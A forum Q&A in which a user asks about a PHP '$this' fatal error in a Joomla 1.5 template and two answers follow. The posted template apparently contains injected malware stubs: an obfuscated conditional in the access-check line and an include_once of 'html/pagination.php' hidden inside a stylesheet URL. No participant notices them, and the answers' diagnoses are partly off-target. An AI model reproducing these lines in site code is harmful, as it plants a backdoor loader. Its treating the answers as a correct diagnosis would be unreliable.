# Fatal error: Using $this when not in object context in Joomla

Tags: joomla, joomla1.5

i am using below code, suddenly its start throwing an error like Fatal error: Using $this when not in object context in /foldername/ index.php at line 3. Any help ? `<Head>` portion of my `file` as

```
<?php
// no direct access
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
<!--[if lte IE 6]>
<link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template;include_once('html/pagination.php'); ?>/css/ieonly.css" rel="stylesheet" type="text/css" />
<style>
#topnav ul li ul {
left: -999em;
margin-top: 0px;
margin-left: 0px;
}
</style>
<![endif]-->
<script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/mootools.js"></script>
<script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/moomenu.js"></script>
```

Answer (score 0, accepted):

Replace your top code ie

```
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
```

with this one and let me know then -

```
defined('_JEXEC') or die;
JHtml::_('behavior.framework', true);
//Second line is for Motools core
```

**EDIT**

Add this line as well if missing -

```
$app = JFactory::getApplication();
```

Comment: ,Thankyou for your response and help, but No change, still the same error-- :(

Comment: @NikitaChopra at which line you are getting this error ?

Comment: This is the link http://72.41.177.138/testseries/

Comment: @NikitaChopra have you included this in your code ?? $app = JFactory::getApplication();

Comment: still not..should i have to ?

Comment: @NikitaChopra Add this line in your code as well

Comment: let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/19217/discussion-between-swapnesh-and-nikita-chopra)

Answer (score 0):

You can't use `$this` in a static method. The variable `$this` is only available to class methods as these receive the object on which the method is called.

That's what "when not in object context" means: there's no object passed to that static method because it's static. A static method is part of the class, not part of the objects that are instantiated using that class.

`$this` is only meant to be used inside class methods. Try to find out where "template" is actually defined. You can try replacing `$this->template` with just `$template` but I don't know how your stuff is set up.

Read more [Link 1](https://stackoverflow.com/questions/9998180/fatal-error-using-this-when-not-in-object-context),[Link 2](https://stackoverflow.com/questions/2597914/php-fatal-error-using-this-when-not-in-object-context-joomla), [Link 3](https://stackoverflow.com/questions/1643931/fatal-error-using-this-when-not-in-object-context),[Link 4](https://stackoverflow.com/questions/2350937/php-fatal-error-using-this-when-not-in-object-context)